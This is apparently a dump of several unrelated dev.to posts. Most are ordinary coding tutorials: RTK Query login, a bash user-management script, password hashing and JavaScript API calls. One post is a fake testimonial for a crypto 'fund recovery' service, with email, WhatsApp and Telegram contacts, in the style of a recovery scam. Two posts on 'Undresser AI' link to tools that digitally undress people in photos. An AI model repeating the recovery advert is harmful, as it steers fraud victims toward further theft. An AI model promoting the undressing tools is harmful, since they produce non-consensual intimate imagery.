**`injectEndpoints`** on our `baseApi`. - Inside **`injectEndpoints`**, we define our endpoints using a function that receives a `builder` object. - We use `builder.mutation` to define a `login` mutation. This mutation sends a `POST` request to the `/auth/login` endpoint with the user information as the body. ## Using the Login Mutation in Your Component With the endpoint defined, you can now use the `useLoginMutation` hook in your React components to perform login actions. ```javascript import React, { useState } from 'react'; import { useLoginMutation } from './path-to-your-api-file'; const Login = () => { const [login, { isLoading, isError, isSuccess, data }] = useLoginMutation(); const [userInfo, setUserInfo] = useState({ username: '', password: '' }); const handleLogin = async () => { try { await login(userInfo).unwrap(); // handle successful login } catch (error) { // handle login error } }; return ( <div> <input type="text" placeholder="Username" value={userInfo.username} onChange={(e) => setUserInfo({ ...userInfo, username: e.target.value })} /> <input type="password" placeholder="Password" value={userInfo.password} onChange={(e) => setUserInfo({ ...userInfo, password: e.target.value })} /> <button onClick={handleLogin} disabled={isLoading}> {isLoading ? 'Logging in...' : 'Login'} </button> {isError && <p>Error logging in</p>} {isSuccess && <p>Login successful</p>} </div> ); }; export default Login; ``` In this component: - We use the `useLoginMutation` hook to get the `login` function and its state. - We manage user input using `useState`. - When the login button is clicked, we call the `login` function with the user information. ## Important Tip: Enable CORS on the Backend One common mistake beginners make is forgetting to enable Cross-Origin Resource Sharing (CORS) on the backend. CORS is essential when your frontend and backend are hosted on different domains or ports. Without it, your frontend will not be able to communicate with your backend, leading to errors. ### Example of Enabling CORS in Node.js with Express To enable CORS in an Express application, you can use the `cors` middleware: ```javascript const express = require('express'); const cors = require('cors'); const app = express(); app.use(cors({ origin: 'http://localhost:3000', // Adjust this to your frontend's URL credentials: true, // This allows cookies to be included in requests })); ``` Make sure to adjust the `origin` to match your frontend's URL and set `credentials` to `true` to allow cookies. ## Conclusion RTK Query makes it straightforward to manage API calls in your Redux application. By using **`injectEndpoints`**, you can easily define and use endpoints for various API operations, including authentication. Handling cookies during the login process ensures secure and persistent sessions, enhancing user experience. Remember to enable CORS on your backend to avoid common issues with cross-origin requests. --- This blog post provides a quick overview of setting up an authentication API using RTK Query, handling cookies for session management, and the importance of enabling CORS. For more advanced use cases and configurations, refer to the [Redux Toolkit Query documentation](https://redux-toolkit.js.org/rtk-query/overview).
forhad96
1,912,122
RECOVER MONEY FROM BITCOIN AND USDT SCAM BY CONTACTING HACKATHON TECH SOLUTIONS
In the realm of online finance, where deceit often masquerades as opportunity and treachery lurks in...
0
2024-07-05T01:41:11
https://dev.to/sophia_stephen_2f0e4ee571/recover-money-from-bitcoin-and-usdt-scam-by-contacting-hackathon-tech-solutions-3jhp
bitcoin, cryptocurrency, ethereum
In the realm of online finance, where deceit often masquerades as opportunity and treachery lurks in the shadows, discovering a bastion of trust and competence feels akin to unearthing a priceless gem amidst a desolate wasteland. Such a sanctuary, for me, materialized in the form of HACKATHON TECH SOLUTIONS. My odyssey toward HACKATHON TECH SOLUTIONS commenced with a bitter taste of disillusionment, as a once-promising investment endeavor soured into a nightmare of denied withdrawals and dubious conduct. Driven to desperation, I sought recourse from official channels, only to find my entreaties met with indifference, my hope waning with each fruitless plea. Alone and disillusioned, I sought refuge in the boundless expanse of the internet, scouring its depths for a glimmer of salvation amidst the cacophony of cautionary tales. It was amidst this digital labyrinth that the name HACKATHON TECH SOLUTIONS emerged as a beacon of hope, its reputation for integrity, and efficacy standing tall amidst the cacophony of dubious offerings. Entranced by the assurances of their ethical approach and sterling reputation, I took a leap of faith and reached out to their team. From the outset, it was evident that HACKATHON TECH SOLUTIONS was no ordinary firm. Their professionalism and commitment to excellence were palpable, instilling in me a newfound sense of confidence in the face of adversity. But trust, as they say, is a currency earned through deeds, not words. And earn it they did, with each meticulously planned step of the recovery process executed with precision and finesse. Their dedication to ethical practices and unwavering focus on client satisfaction set them apart in a landscape fraught with deceit and uncertainty. As the days turned into weeks and the weeks into months, I marveled at the tenacity and skill with which HACKATHON TECH SOLUTIONS pursued my case. Their resolve never faltered, their determination unwavering in the face of adversity. And then, like a phoenix rising from the ashes, my fortunes began to shift. With each successful recovery, a burden was lifted from my shoulders, replaced by a renewed sense of optimism and possibility. The funds they restored to me were not merely numbers on a screen; they were a lifeline, a beacon of hope in a sea of uncertainty. But their impact extended beyond mere financial restitution. With the recovered funds in hand, I was empowered to settle my debts and pursue my aspirations with newfound vigor. What was once a distant dream blossomed into reality as I embarked on a journey to realize my entrepreneurial ambitions, buoyed by the unwavering support and guidance of the HACKATHON TECH SOLUTIONS team. HACKATHON TECH SOLUTIONS proved to be more than just a solution to my financial predicament; they were a lifeline in a tempest-tossed sea, a guiding light illuminating the path to redemption. To those navigating the perilous waters of online finance, I offer but one piece of advice: place your trust in HACKATHON TECH SOLUTIONS. For they are not merely experts in their field; they are paragons of integrity and guardians of hope in an ever-evolving digital landscape.Reach out to HACKATHON TECH SOLUTIONS via below contact details Email: {[email protected]} Website:[https://hackathontechsolutions.com) Whatsapp: {+31 6 47999256} Telegram: {@hackathontechsolution} OR {+31 6 47999256 }
sophia_stephen_2f0e4ee571
1,912,121
Bash Script Automation for User and Group Management in Linux
Managing user onboarding in a corporate environment can be complex, especially with a large influx of...
0
2024-07-05T01:40:14
https://dev.to/peewells/bash-script-automation-for-user-and-group-management-in-linux-54c6
webdev, bash, automation, devops
Managing user onboarding in a corporate environment can be complex, especially with a large influx of new employees. Manual assignment of users to directories, groups, and configuring permissions can lead to errors and consume valuable time. To streamline this process and ensure efficient onboarding, I've developed a Bash script that automates these tasks, providing a seamless deployment solution. **Overview of the Script ** The Bash script automates several critical tasks: - User and Group Management: Reads user details from an input file, creates user accounts, and manages groups as specified. - Password Management: Generates random passwords securely stored in /var/secure/user_passwords.txt with appropriate permissions. - Logging: Records all script actions, including successes and errors, in /var/log/user_management.log for auditing purposes. **THE SCRIPT ** ``` #!/bin/bash # Log file and secure passwords file LOGFILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.txt" # Ensure the log file and secure passwords file exist with correct permissions sudo mkdir -p /var/secure sudo touch "$PASSWORD_FILE" sudo chmod 600 "$PASSWORD_FILE" sudo touch "$LOGFILE" sudo chmod 600 "$LOGFILE" # Function to generate a random password generate_password() { openssl rand -base64 12 } # Check if openssl is installed if ! command -v openssl &> /dev/null; then echo "openssl is required but not installed. Please install it and try again." >&2 exit 1 fi # Read the input file line by line while IFS=';' read -r username groups; do # Remove any leading or trailing whitespace username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs) # Create a personal group with the same name as the username if ! getent group "$username" > /dev/null 2>&1; then if sudo groupadd "$username"; then echo "$(date '+%Y-%m-%d %H:%M:%S') - Group '$username' created." >> "$LOGFILE" else echo "$(date '+%Y-%m-%d %H:%M:%S') - Error creating group '$username'." >> "$LOGFILE" continue fi else echo "$(date '+%Y-%m-%d %H:%M:%S') - Group '$username' already exists." >> "$LOGFILE" fi # Create the user if it does not exist if ! id -u "$username" > /dev/null 2>&1; then if sudo useradd -m -s /bin/bash -g "$username" "$username"; then echo "$(date '+%Y-%m-%d %H:%M:%S') - User '$username' created." >> "$LOGFILE" # Generate a random password for the user password=$(generate_password) echo "$username:$password" | sudo chpasswd echo "$username:$password" | sudo tee -a "$PASSWORD_FILE" > /dev/null # Set ownership and permissions for the user's home directory sudo chown "$username":"$username" "/home/$username" sudo chmod 700 "/home/$username" echo "$(date '+%Y-%m-%d %H:%M:%S') - Password for '$username' set and stored securely." >> "$LOGFILE" else echo "$(date '+%Y-%m-%d %H:%M:%S') - Error creating user '$username'." >> "$LOGFILE" continue fi else echo "$(date '+%Y-%m-%d %H:%M:%S') - User '$username' already exists." >> "$LOGFILE" fi # Add user to additional groups IFS=',' read -ra group_array <<< "$groups" for group in "${group_array[@]}"; do group=$(echo "$group" | xargs) if ! getent group "$group" > /dev/null 2>&1; then if sudo groupadd "$group"; then echo "$(date '+%Y-%m-%d %H:%M:%S') - Group '$group' created." >> "$LOGFILE" else echo "$(date '+%Y-%m-%d %H:%M:%S') - Error creating group '$group'." >> "$LOGFILE" continue fi fi if sudo usermod -aG "$group" "$username"; then echo "$(date '+%Y-%m-%d %H:%M:%S') - User '$username' added to group '$group'." >> "$LOGFILE" else echo "$(date '+%Y-%m-%d %H:%M:%S') - Error adding user '$username' to group '$group'." >> "$LOGFILE" fi done done < "$1" echo "User creation process completed." exit 0 ``` **Script Breakdown ** ``` #!/bin/bash # Log file and secure passwords file LOGFILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.txt" # Ensure the log file and secure passwords file exist with correct permissions sudo mkdir -p /var/secure sudo touch "$PASSWORD_FILE" sudo chmod 600 "$PASSWORD_FILE" sudo touch "$LOGFILE" sudo chmod 600 "$LOGFILE" # Function to generate a random password generate_password() { openssl rand -base64 12 } # Check if openssl is installed if ! command -v openssl &> /dev/null; then echo "openssl is required but not installed. Please install it and try again." >&2 exit 1 fi # Read the input file line by line while IFS=';' read -r username groups; do # Remove any leading or trailing whitespace username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs) ``` **Initialization and File Setup ** Purpose: Sets up necessary files (user_passwords.txt and user_management.log) with secure permissions. Explanation: Creates directories and files if they don't exist, ensuring only privileged access (600 permissions) for security. ``` # Function to generate a random password generate_password() { openssl rand -base64 12 } ``` Random Password Generation: Purpose: Provides a function to create strong, random passwords for new user accounts. Explanation: Uses OpenSSL to generate a 12-character random password encoded in base64 format, ensuring security and complexity for user accounts. ``` # Check if OpenSSL is installed if ! command -v openssl &> /dev/null; then echo "Error: OpenSSL is required but not installed. Please install it and try again." >&2 exit 1 fi ``` **Dependency Check (OpenSSL): ** Purpose: Ensures the script can use OpenSSL for generating passwords securely. Explanation: Checks if OpenSSL is installed (command -v openssl &> /dev/null). If not, it outputs an error message and stops script execution, ensuring all dependencies are met before proceeding. ``` # Process each line from the input file while IFS=';' read -r username groups; do # Trim whitespace from username and groups username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs) ``` **Input Processing (User and Group Management): ** Purpose: Reads user details from an input file, cleans up whitespace, and manages user and group creation. Explanation: Reads each line of the input file, splitting data into username and groups. It trims any leading or trailing whitespace (xargs), preparing data for user and group management tasks. **To successfully run this script, follow these steps: ** Ensure the script is Executable: `chmod +x create_users.sh` Run the Script with Sudo: `sudo ./create_users.sh` Reading the Input File (users.txt): The script reads each line from the input file containing usernames and groups separated by a semicolon. Multiple groups are separated by commas. Example Input File (users.txt): ``` light; sudo,dev,www-data idimma; sudo mayowa; dev,www-data ``` Note: This input creates users Light,idimma, and Mayowa assigning them to the specified groups. **Conclusion ** In conclusion, this Bash script exemplifies how automation simplifies complex tasks such as user and group management in Linux environments. By leveraging shell scripting, administrators can achieve consistency, security, and efficiency across system deployments. For places where you can grow your tech.skills and get hands-on projects, please visit: https://hng.tech/internship OR https://hng.tech/hire
peewells
1,912,120
How to store password in Database
Storing passwords securely in a database is critical for maintaining the integrity and security of a...
0
2024-07-05T01:37:00
https://dev.to/zeeshanali0704/how-to-store-password-in-database-bbh
systemdesign, javascript, systemdesignwithzeeshanali
Storing passwords securely in a database is critical for maintaining the integrity and security of a system. Here are key methods and best practices for password storage in terms of system design: ### 1. **Use Strong Hashing Algorithms** - **Hashing**: Store the hashed version of the password instead of the plaintext password. Use strong, cryptographic hashing algorithms like: - **bcrypt**: Designed specifically for hashing passwords and includes a salt automatically. - **Argon2**: The winner of the Password Hashing Competition (PHC), designed to resist GPU cracking. - **PBKDF2**: Uses a pseudorandom function (such as HMAC) and is configurable to be slow. ### 2. **Salting Passwords** - **Salting**: Add a unique, random salt to each password before hashing to prevent rainbow table attacks. - Ensure each password is concatenated with a unique, random string (salt) before hashing. Store the salt in the database alongside the hashed password. ### 3. **Pepper** - **Peppering**: Add a static secret value (pepper) to all passwords before hashing. The pepper should be kept secret and stored separately from the database, often in application code or environment variables. ### Key Outcomes - Choose hashing algorithms that are intentionally slow (like bcrypt, Argon2, or PBKDF2) to make brute-force attacks more difficult. - Use techniques like PBKDF2, bcrypt, or Argon2, which internally apply the hashing function multiple times to increase computation time. - Store salts in the same database table as the hashed passwords. Salts do not need to be secret but should be unique per password. - Ensure your database and application environment are secure: Use HTTPS for data transmission. Apply database access controls and encryption. Regularly update and patch systems to fix vulnerabilities. - Conduct regular security audits and code reviews to ensure password storage and handling follow best practices. ### Conclusion Implementing these methods ensures that even if an attacker gains access to the database, the passwords remain protected. Proper hashing, salting, and environment security practices are fundamental to secure password storage in system design. More Details: Get all articles related to system design Hastag: SystemDesignWithZeeshanAli Git: https://github.com/ZeeshanAli-0704/SystemDesignWithZeeshanAli
zeeshanali0704
1,912,119
How to Call an API in JavaScript
How to Call an API in JavaScript Calling an API (Application Programming Interface) in JavaScript...
0
2024-07-05T01:23:05
https://dev.to/mibii/how-to-call-an-api-in-javascript-31oj
javascript, api, programming, beginners
How to Call an API in JavaScript Calling an API (Application Programming Interface) in JavaScript involves a few straightforward steps. Here’s a detailed guide to help you understand and implement API calls using various methods: ## Steps to Call an API To Send an HTTP Request to the API Endpoint Use a library like: - XMLHttpRequest (XHR): The traditional way to send HTTP requests. - fetch(): The modern, promise-based way to send HTTP requests. - Axios: A popular promise-based HTTP client. 2. Specify the Request Method: Methods include GET, POST, PUT, DELETE, etc. 3. Pass Data to the API (if required): For methods like POST and PUT, you might need to send data in the request body. 4. Handle the Response Data: Process the data returned from the API and handle any errors. ## Example Using fetch() The fetch() function is a modern way to make HTTP requests. Here’s an example of how to use it: ``` fetch('https://api.example.com/data') .then(response => { if (!response.ok) { throw new Error('Network response was not ok ' + response.statusText); } return response.json(); }) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); ``` Explanation: fetch('https://api.example.com/data'): Sends a GET request to the API endpoint. response.ok: Checks if the response status is OK (status code 200-299). response.json(): Parses the response as JSON. console.log(data): Logs the parsed data to the console. catch(error => console.error('Error:', error)): Catches and logs any errors. ## Example Using Axios Axios is a promise-based HTTP client that provides an easy-to-use API. Here’s how to use Axios to make an API call: ``` axios.get('https://api.example.com/data') .then(response => console.log(response.data)) .catch(error => console.error('Error:', error)); ``` Explanation: axios.get('https://api.example.com/data'): Sends a GET request to the API endpoint. response.data: Accesses the data from the response. catch(error => console.error('Error:', error)): Catches and logs any errors. ## Important Tips Replace the API Endpoint URL: Make sure to replace https://api.example.com/data with the actual URL of the API you're trying to call. Handling Different HTTP Methods: For methods like POST, PUT, DELETE, you’ll need to adjust the request method and possibly the data payload. ``` // Example of a POST request using fetch() fetch('https://api.example.com/data', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ key: 'value' }), }) .then(response => response.json()) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); ``` ``` // Example of a POST request using Axios axios.post('https://api.example.com/data', { key: 'value' }) .then(response => console.log(response.data)) .catch(error => console.error('Error:', error)); ``` Conclusion Calling an API in JavaScript is essential for fetching and sending data. By understanding how to use libraries like fetch() and Axios, you can effectively interact with APIs to build dynamic and responsive applications. Always ensure you handle errors gracefully and use the appropriate HTTP methods for your API interactions.
mibii
1,912,117
What is the difference between SDK, JDK, OpenJDK, JRE, JVM, java compiler in java platform ?
What is the difference between SDK, JDK, OpenJDK, JRE, JVM, java compiler in java platform ?
0
2024-07-05T01:19:57
https://dev.to/grenierdudev/what-is-the-difference-between-sdk-jdk-openjdk-jre-jvm-java-compiler-in-java-platform--3d71
java, jvm, javac
[What is the difference between SDK, JDK, OpenJDK, JRE, JVM, java compiler in java platform ? ](https://grenierdudev.com/posts/what-is-the-difference-between-sdk-jdk-openjdk-jre-jvm-java-compiler-in-java-platform-2d42e37)
grenierdudev
1,912,116
What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part C
What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part C
0
2024-07-05T01:16:15
https://dev.to/grenierdudev/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-c-2nfg
webassembly, rust, cpp, javascript
[What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part C](https://grenierdudev.com/posts/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-c-1009bf7)
grenierdudev
1,912,115
What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part B
What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part B
0
2024-07-05T01:15:14
https://dev.to/grenierdudev/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-b-1k01
webassembly, rust, cpp, javascript
[What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part B](https://grenierdudev.com/posts/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-b-17cfc10)
grenierdudev
1,912,114
What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part A
What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part A
0
2024-07-05T01:14:02
https://dev.to/grenierdudev/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-a-4aag
webassembly, rust, cpp, javascript
[What is Wasm or WebAssembly ? Learn WebAssembly Basics with Rust Part A](https://grenierdudev.com/posts/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-a-26ea079)
grenierdudev
1,912,113
What is the cost of implementing Undresser AI?
Artificial intelligence (AI) has become an integral part of various industries, driving efficiency,...
0
2024-07-05T01:13:53
https://dev.to/guestposts/what-is-the-cost-of-implementing-undresser-ai-3528
ai, webtesting
Artificial intelligence (AI) has become an integral part of various industries, driving efficiency, innovation, and enhanced user experiences. Among the many applications of AI, one controversial and highly specialized area is "Undresser AI," a technology designed to digitally remove clothing from images of people. While this technology raises significant ethical concerns, it also entails various costs associated with its implementation. This article delves into the financial, technical, and ethical costs of implementing Undresser AI. ## Financial Costs ### Development and Integration The initial financial cost of implementing **[Undresser AI](https://undresser.ai/ai-undress/)** is substantial. Developing such an AI requires a team of skilled software engineers, data scientists, and AI specialists. The cost of hiring these professionals can be high, with salaries varying significantly based on location and experience. Additionally, the development process involves extensive research, design, and testing phases, all of which require substantial investment. Integrating Undresser AI into existing systems or platforms also incurs costs. This includes the expenses related to software and hardware upgrades, as well as the costs of training staff to use the new technology. Companies might also need to invest in cloud services or high-performance computing infrastructure to handle the AI’s processing needs efficiently. ### Data Acquisition and Management Training an AI model to undress individuals digitally requires a massive dataset of images. Acquiring such data, especially in an ethical and legal manner, can be costly. Companies may need to purchase datasets, which can range from thousands to millions of dollars, depending on the volume and quality of the data. Data management costs include storage, processing, and ensuring compliance with data protection regulations such as GDPR. Proper data handling practices must be in place to avoid legal repercussions, adding to the overall expense. ## Technical Costs ### Computational Resources The computational resources required to develop and run Undresser AI are significant. Training complex neural networks involves high-powered GPUs and extensive computational time. The costs of these resources can add up quickly, especially if the AI model needs to be continuously updated and improved. Running the AI in real-time applications also demands substantial computational power. For instance, if a company wants to implement this AI in a mobile application, the processing must be efficient enough to ensure smooth user experiences, necessitating further investment in optimization and computational resources. ### Maintenance and Upgrades Once implemented, Undresser AI requires ongoing maintenance and upgrades. AI models need regular updates to improve accuracy, incorporate new data, and address any discovered biases or errors. This continual improvement process requires a dedicated team and ongoing financial investment. Additionally, as technology evolves, the hardware and software supporting the AI will need periodic upgrades to maintain optimal performance. These upgrades come with their own set of costs, including potential downtime and disruption during the implementation of new systems. ## Ethical Costs ### Privacy and Consent The most significant non-financial cost of implementing Undresser AI is the ethical dilemma it presents. The technology inherently raises serious privacy concerns. Digitally undressing individuals without their explicit consent is a gross invasion of privacy and can lead to severe psychological and social consequences for the victims. Implementing such technology responsibly necessitates robust consent mechanisms, ensuring that individuals are fully aware of and agree to the use of their images in this manner. Developing and enforcing these consent protocols can be complex and costly, both in terms of time and resources. ### Legal and Reputational Risks The legal implications of Undresser AI are profound. Unauthorized use of this technology can lead to significant legal repercussions, including lawsuits and fines. Companies must navigate a complex web of regulations and ensure compliance with privacy laws to avoid legal trouble. Beyond legal risks, there is the potential for severe reputational damage. Public backlash against companies using **[Undresser AI](https://undresser.ai/ai-undress/)** can be intense, leading to loss of customer trust and business opportunities. Managing this risk requires a careful and transparent approach, including robust public relations strategies and ethical guidelines. ## Conclusion The cost of implementing Undresser AI extends far beyond financial expenditure. While the development, integration, and maintenance of this technology require substantial investment, the ethical and reputational costs are equally significant. Companies must weigh these factors carefully, considering not only the monetary implications but also the broader societal impact. Responsible implementation, adherence to legal frameworks, and ethical considerations are paramount to navigating the complex landscape of Undresser AI.
guestposts
1,912,111
What are the Limitations of "Undressing AI" in Terms of Dress Removal?
Artificial Intelligence (AI) has made significant strides in various fields, from healthcare to...
0
2024-07-05T01:10:52
https://dev.to/guestposts/what-are-the-limitations-of-undressing-ai-in-terms-of-dress-removal-168b
machinelearning, webdev
Artificial Intelligence (AI) has made significant strides in various fields, from healthcare to finance, and even in creative domains like art and fashion. One controversial and ethically problematic application of AI is "Undressing AI," a term used to describe AI tools designed to simulate the removal of clothing from images of people. Despite advancements in machine learning and image processing, these tools come with numerous limitations and ethical concerns that need to be thoroughly understood. ## Technical Limitations ### Accuracy and Realism One of the primary technical limitations of **[undressing AI](https://porngen.art/undress-ai/)** is the lack of accuracy and realism in the generated images. Even the most advanced AI models struggle to produce images that convincingly depict the removal of clothing while maintaining anatomical accuracy. The AI often generates unrealistic body proportions, skin textures, and lighting inconsistencies that make the output appear unnatural and fabricated. ### Data Dependency Undressing AI relies heavily on large datasets of images for training. These datasets must include a wide variety of body types, skin tones, and clothing styles to ensure the AI can generalize well. However, obtaining such diverse and comprehensive datasets is challenging and often impractical. This limitation leads to biased outputs where the AI performs well on certain demographics while failing miserably on others. ### Ethical Data Collection The process of collecting data for training undressing AI is fraught with ethical dilemmas. Gathering images of people, especially without their consent, for the purpose of developing such tools is a significant invasion of privacy. Furthermore, the use of these images can perpetuate harmful stereotypes and objectification, raising serious ethical concerns about the technology's implications. ## Ethical and Moral Concerns ### Consent and Privacy The most glaring ethical issue with undressing AI is the violation of consent and privacy. Using AI to remove clothing from images without the subject's permission is a gross invasion of privacy and can cause significant emotional and psychological harm to the individuals depicted. This misuse of technology can lead to a range of negative consequences, from personal embarrassment to severe mental health issues. ### Objectification and Exploitation Undressing AI exacerbates the objectification and exploitation of individuals, particularly women. By creating tools that strip away clothing, the technology contributes to a culture that values people based on their physical appearance and reduces them to mere objects of visual gratification. This can have far-reaching implications for societal attitudes towards body image and respect for personal boundaries. ### Legal Implications The use of undressing AI can lead to various legal ramifications. Creating and distributing manipulated images without consent can be considered a form of harassment or defamation, subjecting individuals to unwanted exposure and potential blackmail. Many jurisdictions have laws against non-consensual pornography and image-based abuse, and the development and use of undressing AI could potentially fall under these legal frameworks. ## Technical Safeguards and Limitations ### Detection and Prevention To combat the misuse of **[undressing AI](https://porngen.art/undress-ai/)**, there have been efforts to develop tools that can detect and prevent the distribution of manipulated images. These tools analyze images for signs of tampering and can flag content that appears to have been altered using AI. However, the effectiveness of these safeguards is limited, as the technology to detect deepfakes and other AI-generated content is still in its infancy and often lags behind the methods used to create such content. ### Responsible AI Development Ensuring responsible development and deployment of AI technologies is crucial to mitigating the risks associated with undressing AI. This includes establishing strict ethical guidelines for data collection, implementing robust consent mechanisms, and fostering transparency in AI development processes. However, achieving these goals is challenging, given the rapid pace of AI advancement and the diverse range of stakeholders involved. ## Conclusion While the technological advancements in AI continue to push boundaries, the development of undressing AI highlights significant limitations and ethical challenges. The inaccuracies, ethical concerns, and potential for misuse of this technology underscore the need for stringent safeguards and responsible AI development practices. As society navigates the complexities of AI, it is crucial to prioritize respect for individual privacy and ethical considerations to ensure that such powerful tools are used for beneficial purposes rather than harmful exploitation.
guestposts
1,912,497
How to try experimental CSS features
I love that browsers are now shipping new CSS features that may not necessarily have been fully baked...
0
2024-07-05T09:31:12
https://chenhuijing.com/blog/how-to-try-experimental-css-features/
css, webdev
--- title: How to try experimental CSS features published: true date: 2024-07-05 01:10:21 UTC tags: css, webdev canonical_url: https://chenhuijing.com/blog/how-to-try-experimental-css-features/ cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2lzjhhdzwzaucsexxm0o.jpg --- I love that browsers are now shipping new CSS features that may not necessarily have been fully baked yet behind feature flags. I can’t actually pinpoint the exact date or event that started this, but my personal observation (because I was there) tags it at the development of CSS grid. If you were not around for it, all the major browsers supported the stable version of CSS grid within 8 months of each other. Trust me, I took the time to check the dates in order to make this image for my talks. ![Dates when CSS grid where released in 2017](https://chenhuijing.com/assets/images/posts/experimental-css/grid-release-1280.png) Browser vendors and CSS specification authors want real-world developer feedback during the feature development process to work out the kinks in the proposals and implementations. They had tried using vendor prefixes as an earlier approach, and we ended up with a decade’s worth of baggage, where browsers had to support property names that were deprecated in the specification because there will be people who inevitably [choose to eat the marshmallow quickly instead of waiting it out](https://en.wikipedia.org/wiki/Stanford_marshmallow_experiment) and use features that are not ready in production. When CSS grid rolled around, they tried a different approach. CSS grid was available to developers who wanted to try it out but behind feature flags in the respective browsers. This meant that the developer who decided to use the not-yet-ready feature had to bank on their audience turning on the flag themselves, and we all know that’s not likely to happen. Which is why when browsers rolled out CSS grid in their stable versions, they did not have to worry about having to support earlier iterations of the syntax running around in the wild, because those were really quite minimal. The approach worked. And I think that’s why it has become a standard approach to how new CSS features are being released these days. ## The UI of feature flags Every browser handles their feature flags differently, and after seeing Safari’s approach for the first time today, I thought I’d summarise how the major browsers we develop on do this. I asked ChatGPT when each of the big 3 introduced feature flags and here are the answers. 🙋🏻‍♀️: when did chrome introduce feature flags? 🤖: Google Chrome introduced feature flags (also known as experimental features) with the launch of Chrome 8 in **December 2010**. Feature flags allow users to enable or disable various experimental features and options before they are officially released, by visiting chrome://flags in the browser. 🙋🏻‍♀️: when did firefox introduce feature flags? 🤖: Mozilla Firefox introduced feature flags, accessible via about:config, much earlier than Chrome. The about:config interface has been available since at least Firefox 2, which was released in **October 2006**. This interface allows users to modify advanced settings and enable or disable experimental features. 🙋🏻‍♀️: and when did safari roll out it’s new feature flag tab in developer settings? 🤖: Safari rolled out its new feature flag tab in the Developer settings with the release of Safari 13, which was introduced in **September 2019**. This feature, accessible through the “Develop” menu, allows developers to enable or disable experimental features and technologies in the browser. I think these should be largely accurate, someone tell me if they’re not. ### Safari Admittedly, Safari is not a browser I use on the regular, only when testing, and it is generally a cursory load page, scroll page, move on to next page, kind of thing. So sadly, it was only recently (5 years after release) that I noticed “Feature Flags” had a dedicated tab in Developer settings. ![Feature flag tab in Safari's developer settings](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) To me, this is a significant improvement in developer experience because it makes testing new features (not just CSS but all the other web APIs) easily discoverable and toggleable (this is not a word, I know). The steps for Safari are: 1. From the menu bar choose Develop > Feature Flags… 2. Scroll through the list and pick what you want to try 3. Toggle the respective checkbox 4. Relaunch the browser That’s it. Feature flags have been elevated to a first-class developer feature in Safari, given it gets dedicated menu shortcut space in the Develop dropdown. So I’m pretty impressed by this experience. You can read [Safari’s documentation](https://developer.apple.com/documentation/safari-developer-tools/feature-flag-settings) for more details. ### Chrome Chrome doesn’t do feature flags that granularly (at least that’s my observation). But they have had this feature for as long as since I started really deep diving into CSS. Chrome does flags in a broader manner and it can be summarised as major features, which have feature-specific flags, smaller features which take around 1-2 quarters of work under `#enable-experimental-web-platform-features` and very rarely, features that only ship in Canary. ![Feature flags interface on Chrome](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) The steps for Chrome are: 1. Type `chrome://flags` in your address bar 2. Search for the feature 3. Set value to **Enabled** M 4. Relaunch the browser ![Using the search bar on the feature flags interface in Chrome](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) Might be less intuitive than the Safari interface, and I’m not too sure where to find the list of features covered in under the `#enable-experimental-web-platform-features` flag, but still, good enough for me. You can read [Chrome’s documentation](https://developer.chrome.com/docs/web-platform/chrome-flags) for more details. ### Firefox Firefox takes the granular approach as well, but in a more “raw” manner. Basically, after you get past the Here be dragons message (I think they changed the copy but it was fun back then), you get a blank results screen that again warns you of messing up the browser. But once you click “Show all”, you will notice that the flags follow a naming convention. ![Initial screen in Firefox's configuration interface](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) I think these flag names are exposed from their usage in the source code (see [StaticPrefList.yaml](https://searchfox.org/mozilla-central/source/modules/libpref/init/StaticPrefList.yaml)), because if you do it like Safari or Chrome, there’s probably an extra mapping to link the actual source code to the presentation of the feature in plain English. Just my speculation. The steps for Firefox are: 1. Type `about://config` in your address bar 2. Accept the risk and continue knowing that you might screw up your browser messing with flags 3. Search for the feature you want 4. Double-click on the feature to toggle it. You can also change string values if that is relevant. 5. Relaunch the browser ![Using the search bar on the feature flags interface in Firefox](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) The search function is pretty crucial here, but overall, you know which features you’re toggling, and because it covers all browser features, it’s not simply boolean, there are string and number values you can manipulate as well. I guess that’s why there’s an extra layer of here be dragons before letting you play around. You can read [Firefox’s documentation](https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Experimental_features) for more details. ## Wrapping up Well, that’s it. Nice and short. Keep exploring, but don’t blow up your browser! _<small>Credits: OG:image from <a href="https://www.deviantart.com/egor412112/art/Cat-scientist-752200669">Egor412112</a></small>_
huijing
1,912,109
Hello! I'm very thrill to meet new people also to become part of this
A post by Caleb Kwao
0
2024-07-05T01:04:24
https://dev.to/caleb_kwao_edf0f2c42a99f8/hello-im-very-thrill-to-meet-new-people-also-to-become-part-of-this-eg3
caleb_kwao_edf0f2c42a99f8
1,912,108
Answer: How to increment ID inside a <%= for %> view helper
answer re: How to increment ID inside a...
0
2024-07-05T00:58:09
https://dev.to/sonfordson/answer-how-to-increment-id-inside-a-view-helper-1b4a
{% stackoverflow 42993988 %}
sonfordson
1,912,106
How to Predict the Next Viral Video Using Machine Learning
In today's digital age, the quest for predicting the next viral video has become the holy grail for...
0
2024-07-05T00:49:05
